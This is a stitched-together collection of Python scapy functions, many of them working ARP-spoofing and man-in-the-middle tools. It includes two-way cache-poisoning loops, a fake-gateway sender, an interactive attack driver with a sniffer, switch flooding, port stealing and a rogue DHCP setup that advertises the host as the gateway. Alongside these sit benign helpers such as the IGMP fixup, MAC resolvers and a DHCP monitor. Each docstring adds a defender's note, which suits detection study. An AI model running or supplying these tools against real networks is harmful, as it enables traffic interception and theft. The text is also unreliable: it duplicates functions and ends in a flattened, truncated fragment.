def exploit(gateway, ip):
    """Send one forged ARP reply to each side of a gateway/host pair.

    Both current MAC addresses are resolved with ``getmacbyip``. Two ARP
    replies (``op=2``) are then built, each naming the *other* party's IP as
    the sender protocol address, and each is sent once. ``hwsrc`` is never
    set here, so the sender hardware address is whatever scapy fills in by
    default.

    Defender's view: unsolicited replies that change an existing IP-to-MAC
    binding are the signal that Dynamic ARP Inspection, static ARP entries
    for the gateway, and ARP-watch style monitors key on.

    Returns:
        tuple: ``(ipmac, gmac)`` as resolved before sending. ``getmacbyip``
        returns ``None`` when it gets no answer, so either value may be
        ``None``.
    """
    gmac = getmacbyip(gateway)
    ipmac = getmacbyip(ip)
    # Reply addressed to `ip`, carrying the gateway's IP as sender.
    packet1 = ARP(op=2, pdst=ip, psrc=gateway, hwdst=gmac)
    # Reply addressed to the gateway, carrying `ip` as sender.
    packet2 = ARP(op=2, pdst=gateway, psrc=ip, hwdst=ipmac)
    for pack in [packet1, packet2]:
        send(pack, verbose=False)
    return ipmac, gmac
def arpspoof(target='192.168.2.16', host='192.168.2.1', interface='eth2'):
    """Repeatedly announce this interface's MAC for both ``target`` and ``host``.

    Every three seconds, two ARP ``is-at`` frames are rebuilt and sent: one
    tells ``target`` that ``host`` is at the local interface's MAC, the
    other tells ``host`` the same about ``target``. The loop never exits on
    its own. The destination MACs are re-resolved with ``getmacbyip`` on
    every iteration.

    Defender's view: the same MAC being advertised for two different IPs,
    refreshed on a fixed interval, is a pattern ARP monitoring and switch
    features such as Dynamic ARP Inspection are designed to detect.

    Args:
        target: IP address of the first host (hard-coded default).
        host: IP address of the second host (hard-coded default).
        interface: Local interface whose hardware address is advertised.
    """
    while True:
        # Frame for `target`: sender IP = host, sender MAC = local interface.
        pkt_target = Ether() / ARP(op='is-at', psrc=host, pdst=target, hwsrc=get_if_hwaddr(interface), hwdst=getmacbyip(target))
        # Frame for `host`: sender IP = target, sender MAC = local interface.
        pkt_host = Ether() / ARP(op='is-at', psrc=target, pdst=host, hwsrc=get_if_hwaddr(interface), hwdst=getmacbyip(host))
        sendp(pkt_target)
        sendp(pkt_host)
        time.sleep(3)
def restore(gateway, ip):
    """Broadcast the genuine IP-to-MAC bindings for ``ip`` and ``gateway``.

    Each packet is an ARP reply (``op=2``) whose sender hardware address is
    the MAC that ``getmacbyip`` currently resolves for the sender IP, with
    the broadcast address as ``hwdst``. Each packet is sent once.

    Note that ``getmacbyip`` returns ``None`` when the lookup gets no
    answer; this function passes that value straight into ``hwsrc``.
    """
    # Announce ip -> its resolved MAC.
    packet1 = ARP(op=2, pdst=gateway, psrc=ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=getmacbyip(ip))
    # Announce gateway -> its resolved MAC.
    packet2 = ARP(op=2, pdst=ip, psrc=gateway, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=getmacbyip(gateway))
    for pack in [packet1, packet2]:
        send(pack, verbose=False)
def igmpize(self):
    """Fix up the packet so that it follows the IGMP RFC addressing rules.

    The rules applied are:

    - General:
        1. The Max Response time is meaningful only in Membership Queries
           and is set to zero for every other type.
    - IP:
        1.  Send a General Group Query to 224.0.0.1 (all systems).
        2.  Send a Leave Group to 224.0.0.2 (all routers).
        3a. Otherwise send the query to the group address.
        3b. Send reports/joins to the group address.
        4.  ttl = 1 (RFC 2236, section 2).
        5.  Add the Router Alert IP option (RFC 2236, section 2).
    - Ether:
        1. Recalculate the destination MAC from the new IP destination.

    Returns:
        True when the ether/ip/self stack passed every check and now
        represents a proper IGMP packet.
        False when the group address or the message type failed
        validation. The IP and Ethernet headers are left untouched in that
        case, but ``mrcode`` may already have been reset to zero because
        General rule 1 runs before validation.
    """
    # Local import: IGMPv3 lives in a sibling contrib module.
    from scapy.contrib.igmpv3 import IGMPv3
    gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0"  # noqa: E501
    underlayer = self.underlayer
    if self.type not in [0x11, 0x30]:  # General Rule 1  # noqa: E501
        self.mrcode = 0
    if isinstance(underlayer, IP):
        if (self.type == 0x11):
            if (gaddr == "0.0.0.0"):
                underlayer.dst = "224.0.0.1"  # IP rule 1  # noqa: E501
            elif isValidMCAddr(gaddr):
                underlayer.dst = gaddr  # IP rule 3a  # noqa: E501
            else:
                warning("Invalid IGMP Group Address detected !")
                return False
        elif ((self.type == 0x17) and isValidMCAddr(gaddr)):
            underlayer.dst = "224.0.0.2"  # IP rule 2  # noqa: E501
        elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(gaddr)):  # noqa: E501
            underlayer.dst = gaddr  # IP rule 3b  # noqa: E501
        elif (self.type in [0x11, 0x22, 0x30, 0x31, 0x32] and isinstance(self, IGMPv3)):
            # IGMPv3 messages keep whatever destination is already set.
            pass
        else:
            warning("Invalid IGMP Type detected !")
            return False
        # IP rule 5: add the option only if it is not already present.
        if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options):  # noqa: E501
            underlayer.options.append(IPOption_Router_Alert())
        underlayer.ttl = 1  # IP rule 4
        _root = self.firstlayer()
        if _root.haslayer(Ether):
            # Force recalculate Ether dst
            _root[Ether].dst = getmacbyip(underlayer.dst)  # Ether rule 1  # noqa: E501
    if isinstance(self, IGMPv3):
        self.encode_maxrespcode()
    return True
def main():
    """Parse ``sys.argv`` by hand and run the ARP announcement loop.

    Recognised flags, each found by its own linear scan over ``sys.argv``:

    - ``-h``: call ``help_function()`` and do nothing else.
    - ``-i IFACE``: interface to use (default ``conf.iface``).
    - ``-s ADDR``: source address; parsed but not used in the visible code.
    - ``-d SECONDS``: delay between rounds, converted with ``float``
      (default 0).
    - ``-gw``: also call ``fake_client`` on every round.
    - ``-t IP``: target IP (default empty string).

    A flag that appears as the last argument makes ``sys.argv[i + 1]`` raise
    ``IndexError``. After parsing, the loop calls ``fake_gateway`` (and
    optionally ``fake_client``) forever.

    Defender's view: the traffic produced is a periodic stream of ARP
    ``is-at`` messages naming this host's MAC for the gateway's IP, which is
    what ARP inspection on switches and ARP-watch style monitors report.
    """
    len_arg = len(sys.argv)
    i = 0
    flag_help = True
    # First pass: -h short-circuits everything else.
    while i != len_arg:
        if sys.argv[i] == '-h':
            help_function()
            flag_help = False
            break
        i += 1
    if flag_help:
        i = 0
        interface = conf.iface
        while i != len_arg:
            if sys.argv[i] == '-i':
                interface = sys.argv[i + 1]
                break
            i += 1
        source = get_if_addr(conf.iface)
        i = 0
        while i != len_arg:
            if sys.argv[i] == '-s':
                source = sys.argv[i + 1]
            i += 1
        i = 0
        delay = 0
        while i != len_arg:
            if sys.argv[i] == '-d':
                delay = sys.argv[i + 1]
                delay = float(delay)
            i += 1
        gw = False
        i = 0
        while i != len_arg:
            if sys.argv[i] == '-gw':
                gw = True
            i += 1
        i = 0
        targetIp = ""
        while i != len_arg:
            if sys.argv[i] == '-t':
                targetIp = sys.argv[i + 1]
            i += 1
        gatewayIP = get_gateway_ip()
        gatewayMAC = getmacbyip(gatewayIP)
        while True:
            # The local MAC is re-read every round.
            myMac = get_if_hwaddr(interface)
            fake_gateway(targetIp, myMac, gatewayIP)
            if gw:
                fake_client(targetIp, gatewayIP, myMac, gatewayMAC)
            time.sleep(delay)
def initialize(self):
    """Resolve the configured target's MAC and start ``self.spam`` in a thread.

    The target IP is read from ``self.config['target'].value`` and resolved
    with ``getmacbyip``; the result (``None`` if the lookup gets no answer)
    is stored in ``self.switch``. ``self.running`` is set before the worker
    thread starts.

    Defender's view: the log message names this a switch flood. Port
    security limits on learned MAC addresses per port are the usual
    control against traffic of that kind.

    Returns:
        bool: always ``True``.
    """
    util.Msg("Starting switch flood...")
    self.switch = getmacbyip(self.config['target'].value)
    self.running = True
    thread = Thread(target=self.spam)
    thread.start()
    return True
def fake_gateway(ip, myMac, gatewayIP):
    """Send one ARP ``is-at`` message to ``ip`` that binds ``gatewayIP`` to ``myMac``.

    Args:
        ip: IP address of the host the message is addressed to.
        myMac: Hardware address placed in the ARP sender field.
        gatewayIP: IP address placed in the ARP sender field.

    The recipient's MAC is resolved with ``getmacbyip`` on every call and
    may be ``None`` if the lookup gets no answer.
    """
    # Sends a message to each host in the LAN indicating I'm a gateway.
    targetMAC = getmacbyip(ip)
    arp_response = ARP(pdst=ip, hwdst=targetMAC, psrc=gatewayIP, hwsrc=myMac, op='is-at')
    send(arp_response)
def get_mac(tgt_ip):
    """Resolve the MAC address of ``tgt_ip`` with scapy's ``getmacbyip``.

    Returns the MAC string on success. When the lookup yields ``None`` a
    notice is printed and ``None`` is returned.
    """
    resolved = getmacbyip(tgt_ip)
    if resolved is None:
        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
        return None
    return resolved
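def igmpize(self):
    """Fix up the packet so that it follows the IGMP RFC addressing rules.

    The rules applied are:

    - General:
        1. The Max Response time is meaningful only in Membership Queries
           and is set to zero for every other type.
    - IP:
        1.  Send a General Group Query to 224.0.0.1 (all systems).
        2.  Send a Leave Group to 224.0.0.2 (all routers).
        3a. Otherwise send the query to the group address.
        3b. Send reports/joins to the group address.
        4.  ttl = 1 (RFC 2236, section 2).
        5.  Add the Router Alert IP option (RFC 2236, section 2).
    - Ether:
        1. Recalculate the destination MAC from the new IP destination.

    Returns:
        True when the ether/ip/self stack passed every check and now
        represents a proper IGMP packet.
        False when the group address or the message type failed
        validation. The IP and Ethernet headers are left untouched in that
        case, but ``mrcode`` may already have been reset to zero because
        General rule 1 runs before validation.
    """
    gaddr = self.gaddr if hasattr(self, "gaddr") and self.gaddr else "0.0.0.0"  # noqa: E501
    underlayer = self.underlayer
    if self.type not in [0x11, 0x30]:  # General Rule 1
        self.mrcode = 0
    if isinstance(underlayer, IP):
        if self.type == 0x11:
            if gaddr == "0.0.0.0":
                underlayer.dst = "224.0.0.1"  # IP rule 1
            elif isValidMCAddr(gaddr):
                underlayer.dst = gaddr  # IP rule 3a
            else:
                warning("Invalid IGMP Group Address detected !")
                return False
        elif self.type == 0x17 and isValidMCAddr(gaddr):
            underlayer.dst = "224.0.0.2"  # IP rule 2
        elif self.type in (0x12, 0x16) and isValidMCAddr(gaddr):
            underlayer.dst = gaddr  # IP rule 3b
        else:
            warning("Invalid IGMP Type detected !")
            return False
        # IP rule 5: add the option only if it is not already present.
        if not any(isinstance(x, IPOption_Router_Alert) for x in underlayer.options):  # noqa: E501
            underlayer.options.append(IPOption_Router_Alert())
        # IP rule 4: the docstring has always listed ttl = 1, but the field
        # was never actually set; do it here so the packet matches the RFC.
        underlayer.ttl = 1
        _root = self.firstlayer()
        if _root.haslayer(Ether):
            # Force recalculate Ether dst
            _root[Ether].dst = getmacbyip(underlayer.dst)  # Ether rule 1
    # Local import: IGMPv3 lives in a sibling contrib module.
    from scapy.contrib.igmpv3 import IGMPv3
    if isinstance(self, IGMPv3):
        self.encode_maxrespcode()
    return True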
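def getTargetMac(targetIP):
    """Resolve the MAC address of ``targetIP``, trying up to three times.

    The earlier loop only checked the result on the iteration *after* the
    lookup, so a lookup that succeeded on the third attempt was reported as
    a failure. Each attempt is now checked immediately.

    Args:
        targetIP: IPv4 address to resolve.

    Returns:
        The MAC address string, or ``None`` when all three lookups fail.
    """
    for _ in range(3):
        targetMac = getmacbyip(targetIP)
        if targetMac:
            print("Target: %s MAC address is %s" % (targetIP, targetMac))
            return targetMac
    print("Can't get Target:%s MAC address" % targetIP)
    return None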
def initialize(self):
    """Prompt for a switch address and start ``self.spam`` in a thread.

    An empty answer selects the broadcast MAC; anything else is treated as
    an IP address and resolved with ``getmacbyip``. This is Python 2 code
    (``raw_input``).

    Returns:
        ``None`` if anything raised during the prompt or the lookup,
        otherwise the status string ``'Spamming <address>'``.
    """
    try:
        util.Msg('[enter] for broadcast')
        self.switch = raw_input('[!] Enter switch address: ')
        if self.switch == '':
            self.switch = 'FF:FF:FF:FF:FF:FF'
        else:
            # getmacbyip returns None when the lookup gets no answer; that
            # value is stored unchecked.
            self.switch = getmacbyip(self.switch)
    except:
        # Bare except: also swallows KeyboardInterrupt raised at the prompt.
        return None
    self.running = True
    thread = Thread(target=self.spam)
    thread.start()
    return 'Spamming %s'%(self.switch)
def _get_mac_address_of_ip(self, ip_addr: IPAddress):
    """Resolve ``ip_addr`` to a packed MAC address.

    The raw address bytes are converted to text with ``inet_ntop`` and then
    resolved with ``getmacbyip`` (IPv4) or ``getmacbyip6`` (anything else).

    Returns:
        The result of ``self._pack_mac_addr`` for the resolved MAC, or
        ``None`` (after logging an error) when no MAC was found.
    """
    is_v4 = ip_addr.version == IPAddress.IPV4
    family = socket.AF_INET if is_v4 else socket.AF_INET6
    ip_str = socket.inet_ntop(family, ip_addr.address)
    # Only the selected resolver name is evaluated.
    addr_str = getmacbyip(ip_str) if is_v4 else getmacbyip6(ip_str)
    if addr_str:
        LOG.debug("IP: %s, mac: %s" % (ip_str, addr_str))
        return self._pack_mac_addr(addr_str)
    LOG.error("Coudn't find mac for IP: %s, disabling ebpf" % (ip_str))
    return None
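def send_packet(self, tcp_packet):
    """Wrap ``tcp_packet`` in IP and Ethernet headers and send it.

    The egress interface is looked up once from the routing table and used
    both for the source MAC and as the ``sendto`` target. Previously the
    route was resolved a second time for ``sendto``, which repeated the
    work and could in principle pick a different interface than the one
    whose MAC was written into the frame.

    Args:
        tcp_packet: Object exposing ``source_ip``, ``destination_ip`` and
            ``serialize()``.
    """
    with self._lock:
        destination_ip = tcp_packet.destination_ip
        interface = Route().route(destination_ip)[0]
        ip_packet = IPPacket(source_ip_addr=tcp_packet.source_ip,
                             destination_ip_addr=destination_ip,
                             payload=tcp_packet.serialize())
        # NOTE(review): getmacbyip returns None when the lookup gets no
        # answer; how EthernetPacket treats a None destination is not
        # visible here. Confirm before relying on it.
        ethernet_packet = EthernetPacket(
            source_mac=get_if_hwaddr(interface),
            destination_mac=getmacbyip(destination_ip),
            protocol=ETH_P_IP,
            payload=ip_packet.serialize())
        self.interface_socket.sendto(
            ethernet_packet.serialize(), (interface, ETH_P_ALL))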
def test_agent_agent_attack():
    """Interactive driver: start a periodic ARP sender and a sniffer thread.

    Uses hard-coded adapter name, gateway IP and target IP. Local and
    gateway addresses come from ``get_gw_and_self``; the target MAC is
    resolved with ``getmacbyip``. Two ARP replies (``op=2``) are built, both
    carrying the local MAC as sender, and handed to an ``MTread`` worker
    together with an interval read from stdin. A second thread runs
    ``snifer_shell`` with a BPF filter for the target's non-ARP traffic.

    The loop at the end reads numeric commands: 0 stops, 1 pauses, 2
    resumes the sender.

    Defender's view: both forged frames advertise one MAC for two different
    IPs, which is the binding conflict ARP inspection and ARP-watch style
    tools report.
    """
    netcard = 'Broadcom 802.11n 网络适配器'
    gw_ip = '192.168.123.1'
    target_ip = '192.168.123.224'
    temp = get_gw_and_self(netcard, gw_ip)
    self_ip = temp.get('self_ip')
    self_mac = temp.get('self_mac')
    target_mac = getmacbyip(target_ip)
    gw_mac = temp.get('gw_mac')
    # Frame for the target: gateway IP bound to the local MAC.
    trick_taget = Ether(dst=target_mac, src=self_mac) / ARP(
        op=2, psrc=gw_ip, hwsrc=self_mac, hwdst=target_mac)
    # Frame for the gateway: target IP bound to the local MAC.
    trick_gateway = Ether(dst=gw_mac, src=self_mac) / ARP(
        op=2, psrc=target_ip, hwsrc=self_mac, hwdst=gw_mac)
    t = int(input("请输入攻击时间间隔(秒):"))
    tricker = MTread('tricker', agent_attack_cell, trick_taget, trick_gateway, t)
    tricker.start()  # threading.Thread
    mfilter = "!arp and host " + target_ip
    mprn = lambda pkt: pack(pkt, self_mac, target_mac, gw_mac)
    # sniffer = MTread('sniffer', snifer_shell, mfilter, mprn)
    # sniffer.start()
    threading.Thread(name='sniffer', target=snifer_shell, args=[mfilter, mprn]).start()
    print("攻击开始,目标ip %s,目标Mac %s" % (target_ip, target_mac))
    print('您可输入数字命令控制任务:')
    print("stop trick: 0, pause trick: 1,resume trick: 2")
    f0 = 1  # running state
    while 1:
        f1 = int(input("cmd(a number): "))
        if f0 == 1:  # stop or pause
            if f1 == 1:
                tricker.pause()
                f0 = 0  # paused
                print('tricker已暂停')
            elif f1 == 0:
                tricker.stop()  # stopped
                break
        elif f0 == 0:
            if f1 == 2:
                tricker.resume()  # resume -> running
                f0 = 1
                print('tricker已恢复')
    print('已停止')
def run():
    """Validate prerequisites, then call ``spoof`` every 1.5 s until Ctrl-C.

    Reads the module-level names ``interface``, ``target_ip`` and
    ``gateway_ip``. Exits when not running as root (exit status 1) or when
    the local, target or gateway MAC cannot be resolved. On
    ``KeyboardInterrupt`` it calls ``restore`` with the two resolved MACs
    and leaves the loop.

    Defender's view: a ``restore`` step on exit means the ARP caches may
    look normal after the fact; detection has to rely on logging of binding
    changes while they happen (ARP inspection logs, ARP-watch history).
    """
    if os.geteuid() != 0:
        print("Root required for operation")
        sys.exit(1)
    # Get the native MAC by specified interface
    native_mac = getmac.get_mac_address(interface)
    if not native_mac:
        print("The specified interface does not exist")
        sys.exit()
    target_mac = getmacbyip(target_ip)
    if not target_mac:
        print("The specified target does not exist")
        sys.exit()
    gateway_mac = getmacbyip(gateway_ip)
    if not gateway_mac:
        print("The specified gateway does not exist")
        sys.exit()
    while 1:
        try:
            spoof(native_mac, target_mac, gateway_mac)
            time.sleep(1.5)
        except KeyboardInterrupt:
            restore(target_mac, gateway_mac)
            break
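def getMacAddress(self, ip="0.0.0.0"):
    """Return the MAC address for ``ip``, falling back to the selected interface.

    ``l2.getmacbyip`` is tried first. When it answers with the broadcast or
    the all-zero address, the hardware address of the interface currently
    selected in ``comboInterfacesBox`` is returned instead.

    The lookup stays best-effort: any ordinary error yields ``None``. The
    handler is now ``except Exception`` instead of a bare ``except`` so
    that ``KeyboardInterrupt`` and ``SystemExit`` are no longer swallowed.

    Args:
        ip: IPv4 address to resolve.

    Returns:
        A MAC address string, or ``None`` when nothing could be determined.
    """
    try:
        mac = l2.getmacbyip(ip)
        if mac not in ("ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"):
            return mac
        # tested only on Mac OS, and not working pretty well with virtual
        # interfaces, like virtualbox interfaces
        addresses = psutil.net_if_addrs()[
            self.comboInterfacesBox.currentText()]
        for addr in addresses:
            if addr.family == psutil.AF_LINK:
                return addr.address
        # NOTE(review): reached only when no AF_LINK entry exists, so this
        # entry is some other address family. Kept for compatibility.
        return addresses[1].address
    except Exception:
        return None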
def run(target, victim, interface):
    """
    Send a one-way stream of ARP ``who-has`` frames to ``target`` whose
    sender protocol address is ``victim``.

    The frame is built once and sent in a loop with no delay until
    ``KeyboardInterrupt``. ``hwsrc`` is not set, so scapy supplies the
    sender hardware address.

    Defender's view: hosts may update their ARP cache from the sender
    fields of a request, so monitoring has to cover requests as well as
    replies. A continuous, unpaced stream from one port is also a
    rate-based indicator.

    :param target: target ip address
    :type target: str

    :param victim: victim ip address
    :type victim: str

    :param interface: interface used to send the frames
    :type interface: str
    """
    # May be None if the lookup gets no answer.
    tmac = getmacbyip(target)
    p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target)
    try:
        while 1:
            sendp(p, iface=interface, verbose=0)
    except KeyboardInterrupt:
        pass
def run(target, victim, interface):
    """
    Send a one-way stream of ARP ``who-has`` frames to ``target`` whose
    sender protocol address is ``victim``.

    The frame is built once and sent in a loop with no delay until
    ``KeyboardInterrupt``. ``hwsrc`` is not set, so scapy supplies the
    sender hardware address.

    Defender's view: hosts may update their ARP cache from the sender
    fields of a request, so monitoring has to cover requests as well as
    replies. A continuous, unpaced stream from one port is also a
    rate-based indicator.

    :param target: target ip address
    :type target: str

    :param victim: victim ip address
    :type victim: str

    :param interface: interface used to send the frames
    :type interface: str
    """
    # May be None if the lookup gets no answer.
    tmac = getmacbyip(target)
    p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target)
    try:
        while 1:
            sendp(p, iface=interface, verbose=0)
    except KeyboardInterrupt:
        pass
def __init__(self):
    """Initialise DHCP-related state from the local routing configuration.

    The gateway IP is taken from scapy's route for ``0.0.0.0`` and its MAC
    is resolved with ``getmacbyip``. The local interface address and
    default Ethernet source MAC are recorded as the DHCP server identity.
    The ``__fake*`` fields and the timers are presumably the values placed
    in DHCP replies; the code that uses them is not shown here.

    Defender's view: a host answering DHCP with itself as the gateway is
    what DHCP snooping (trusted-port enforcement) on switches blocks.
    """
    self.__GATEWAY_IP = conf.route.route("0.0.0.0")[2]
    self.__GATEWAY_MAC = getmacbyip(self.__GATEWAY_IP)
    self.__DHCPServerIp = get_if_addr(conf.iface)
    self.__DHCPMac = Ether().src
    # Bookkeeping containers, empty at start.
    self.__dictIPS = {}
    self.__IPPool = []
    self.__fakeDNSServer = "8.8.8.8"
    self.__fakeSubnetMask = ""
    # The advertised gateway is this host's own address.
    self.__fakeGatewayIP = self.__DHCPServerIp
    # Timer values; units presumably seconds (TODO confirm).
    self.__leaseTime = 86400
    self.__renewalTime = 172800
    self.__rebindingTime = 138240
    self.__command = ""
def start(ip_target, output_file, interface):
    """Resolve the target MAC, claim the PID slot, then call ``port_stealing``.

    The file ``control_file`` in the current directory is read and parsed
    with ``ast.literal_eval`` as a dict. If its ``port_stealing_pid`` entry
    is 0, this process writes its own PID there; otherwise the function
    reports that an instance is already running and exits.

    Args:
        ip_target: IP address whose MAC is resolved with ``getmacbyip``.
        output_file: Stored in the module-level global ``file``.
        interface: Passed through to ``port_stealing``.

    Defender's view: port stealing makes a switch relearn a MAC on a
    different port; port security and MAC-move logging on the switch are
    the relevant controls.
    """
    mac_target = getmacbyip(ip_target)
    if mac_target == None:
        six.print_(colored("[!] ERROR - Can't locate the MAC of that IP", "red"))
        exit(0)
    # NOTE: the global name `file` shadows the Python 2 builtin.
    global file
    file=output_file
    #Access control file to check if Port stealing is running. Write PID in file if not.
    control_file = open("control_file", "r+")
    data=ast.literal_eval(control_file.read())
    if data['port_stealing_pid'] == 0:
        data['port_stealing_pid'] = getpid()
        overWriteFile(control_file, str(data))
    else:
        six.print_(colored("[!] ERROR - Port Stealing is running", "red"))
        control_file.close()
        exit(0)
    # On this path control_file is not closed in the visible code;
    # presumably overWriteFile handles it (TODO confirm).
    six.print_("[*] Port Stealing STARTED")
    port_stealing(ip_target, mac_target, interface)
def __init__(self):
    """Set up scan state and the hard-coded target, local and gateway addresses.

    The interface name is extracted from the bracketed part of
    ``str(conf.iface)``. The gateway MAC is resolved with ``getmacbyip``
    during construction and may be ``None`` if the lookup gets no answer.
    The target MAC starts empty.
    """
    # Scan result storage
    self.num = -1
    self.result = []
    # Network interface: take the text between the first "[" and "]"
    pattern = re.compile('\[.*?\]')
    self.interFACE = pattern.findall(str(conf.iface))[0].replace(
        '[', '').replace(']', '')
    # Target machine
    self.target_ip = '192.168.1.4'
    # Local IP (the machine running this tool)
    self.local_ip = get_ip_from_name(self.interFACE)
    # Gateway
    self.gate_ip = "192.168.1.1"
    # Target machine MAC
    self.target_mac = ''
    # Local MAC
    self.local_mac = get_if_hwaddr(self.interFACE)
    # Gateway MAC
    self.gate_mac = getmacbyip(self.gate_ip)
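def getIPAndMac(ip_range):
    """Map each responsive address in ``ip_range`` to ``"<mac>|<vendor>"``.

    Every address is sent one ICMP echo request with a 0.3 s timeout. For
    each address that returns an echo reply (ICMP type 0) from the same
    source, the MAC is resolved with ``l2.getmacbyip`` and a vendor string
    is looked up through ``Mac().search``.

    Missing replies and unresolved MACs are now skipped with explicit
    checks instead of relying on a blanket ``except`` to hide the resulting
    ``AttributeError``/``TypeError``. The unused ``net_info`` local is gone.
    The vendor lookup stays best-effort, as before.

    Args:
        ip_range: Iterable of IPv4 addresses to probe.

    Returns:
        dict: ``{str(ip): "<mac>|<vendor>"}`` for hosts that answered.
    """
    result_list = {}
    for ip in ip_range:
        # Show the address being probed.
        print("=检测ip=>", ip)
        # ICMP echo request, i.e. a ping.
        probe = IP(dst=ip) / ICMP() / b'HelloWorld'
        # Wait at most 0.3 s for one answer; suppress scapy's own output.
        reply = sr1(probe, timeout=0.3, verbose=False)
        if reply is None or not reply.haslayer(IP) or not reply.haslayer(ICMP):
            continue
        if reply.getlayer(IP).fields.get('src') != ip:
            continue
        if reply.getlayer(ICMP).fields.get('type') != 0:
            continue
        mac = l2.getmacbyip(ip)
        if mac is None:
            # Host answered the ping but the MAC lookup got no answer.
            continue
        try:
            com = Mac().search(mac)
        except Exception:
            # Vendor lookup is best-effort; skip the host as before.
            continue
        mac = mac + "|" + str(com)
        result_list[str(ip)] = mac
        print("成功获取一个mac地址:", ip, mac)
    return result_list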
def start(self):
    """Resolve the device MAC, open the L2 socket and start the receiver.

    ``getmacbyip`` is retried for up to ten seconds. The layer-2 socket is
    stored in the module-level global ``socket`` and a base Ethernet frame
    (type 0x6003) is stored in ``self.packet``. If the MAC is still unknown
    the process exits with status 1. Otherwise the receive process is
    started and the method sleeps three seconds so it can initialise.
    """
    global socket
    self.recv_process = multiprocessing.Process(
        target=self.process_receive)
    deadline = time.time() + 10
    while self.dut_mac is None and time.time() < deadline:
        self.dut_mac = getmacbyip(self.sut_ip)
    socket = conf.L2socket(iface=self.sut_interface)
    self.packet = Ether(dst=self.dut_mac, type=0x6003)
    if self.dut_mac is None:
        print("[!] Could not determine target MAC address from IP")
        sys.exit(1)
    self.recv_process.start()
    #self.process_receive()
    # sleep - letting sniffing process initialize
    time.sleep(3)
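def handle_dhcp_packet(packet):
    """Report DHCP Discover, Ack and Inform messages, flagging unknown hosts.

    Whitelisted MACs are only printed; anything else is also written to
    the log through ``print_and_log``.

    Changes from the previous version:

    - The vendor lines in the Ack branch passed the already-resolved vendor
      string back into ``mac_vendor.get_str``; they now print the vendor
      that was looked up from the MAC.
    - The message type is read once and an empty or malformed option list
      falls through to the "other packet" branch instead of raising
      ``IndexError``.

    Args:
        packet: A scapy packet handed over by the sniffer.
    """
    # NOTE(review): as before, this assumes the first DHCP option is the
    # message-type tuple. Confirm against get_option's lookup-by-name if
    # packets with a different option order must be handled.
    msg_type = None
    if DHCP in packet:
        options = packet[DHCP].options
        if options and isinstance(options[0], tuple) and len(options[0]) > 1:
            msg_type = options[0][1]

    # NOTE(review): hostname and vendor_class_id are copied from the
    # client's packet and are therefore untrusted. If the log is read in a
    # terminal or parsed by other tools, consider escaping control
    # characters before writing them.

    # Match DHCP discover
    if msg_type == 1:
        print('---')
        print('New DHCP Discover')
        #print(packet.summary())
        #print(ls(packet))
        hostname = get_option(packet[DHCP].options, 'hostname')
        mac = packet[Ether].src
        if check_whitelist(mac):
            print(f'Whitelisted host {hostname} asked for an IP.')
            print(f'Host vendor: {mac_vendor.get_str(mac)}')
            print(f'Host MAC: {mac}')
            return
        pal_time()
        print_and_log(f"Unknown host {hostname} asked for an IP.")
        print_and_log(f'Host vendor: {mac_vendor.get_str(mac)}')
        print_and_log(f'Host MAC: {mac}')

    # Match DHCP ack
    elif msg_type == 5 and packet[BOOTP].yiaddr != '0.0.0.0':
        print('---')
        print('New DHCP Ack')
        #print(packet.summary())
        #print(ls(packet))
        subnet_mask = get_option(packet[DHCP].options, 'subnet_mask')
        lease_time = get_option(packet[DHCP].options, 'lease_time')
        router = get_option(packet[DHCP].options, 'router')
        name_server = get_option(packet[DHCP].options, 'name_server')
        server_mac = packet[Ether].src
        server_ip = packet[IP].src
        sus_ip = packet[BOOTP].yiaddr
        # NOTE(review): this is an active ARP lookup for an address that
        # was only just assigned, so it can come back as None (rendered
        # here as the string 'None'). The BOOTP chaddr field of the same
        # packet also carries the client hardware address and may be a
        # more reliable source. Confirm before switching.
        sus_mac = str(getmacbyip(sus_ip))
        sus_vendor = mac_vendor.get_str(sus_mac)
        if check_whitelist(sus_mac):
            print(
                f"DHCP Server {server_ip} ({server_mac}) acknowledged a whitelisted device on IP {sus_ip}"
            )
            print(f'Host vendor: {sus_vendor}')
            print(f'Host MAC: {sus_mac}\n')
            return
        pal_time()
        print_and_log(
            f"DHCP Server {server_ip} ({server_mac}) acknowledged unknown device on IP {sus_ip}"
        )
        print_and_log(f'Unknown host vendor: {sus_vendor}')
        print_and_log(f'Unknown host MAC: {sus_mac}\n')
        print(f"DHCP Options: subnet_mask: {subnet_mask}, lease_time: "
              f"{lease_time}, router: {router}, name_server: {name_server}")

    # Match DHCP inform
    elif msg_type == 8:
        print('---')
        print('New DHCP Inform')
        #print(packet.summary())
        #print(ls(packet))
        hostname = get_option(packet[DHCP].options, 'hostname')
        vendor_class_id = get_option(packet[DHCP].options, 'vendor_class_id')
        print(f"DHCP Inform from {packet[IP].src} ({packet[Ether].src}) "
              f"hostname: {hostname}, vendor_class_id: {vendor_class_id}")

    else:
        print('---')
        print('Some Other DHCP Packet')
        print(packet.summary())
        #print(ls(packet))
    return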
eth = Ether() arp = ARP(psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at") pkt = eth / arp return pkt if __name__ == '__main__': parser = argparse.ArgumentParser(description='man in the middle') parser.add_argument('-t', dest='targetip', type=str, help='target ip') parser.add_argument('-g', dest='gatewayip', type=str, help='gateway ip') args = parser.parse_args() tgt_ip = args.targetip tgt_mac = getmacbyip(tgt_ip) gateway_ip = args.gatewayip gateway_mac = getmacbyip(gateway_ip) input('enter') pkt_station = arp(gateway_ip, tgt_mac, tgt_ip) pkt_gateway = arp(tgt_ip, gateway_mac, gateway_ip) print(pkt_station.show()) print(pkt_gateway.show()) while True: sendp(pkt_station) sendp(pkt_gateway) time.sleep(1)
import sys

from scapy.layers.l2 import Ether, ARP, sendp
from scapy.layers.l2 import getmacbyip

# Usage: <script> TARGET_IP HOST_IP
#
# Sends an ARP "is-at" frame to TARGET_IP every two seconds, with HOST_IP as
# the sender protocol address and no explicit hwsrc, so scapy fills in the
# local MAC. On Ctrl-C it sends three frames carrying HOST_IP's resolved MAC
# so the target's cache entry is put back.
#
# Defender's view: the periodic is-at frames change an existing IP-to-MAC
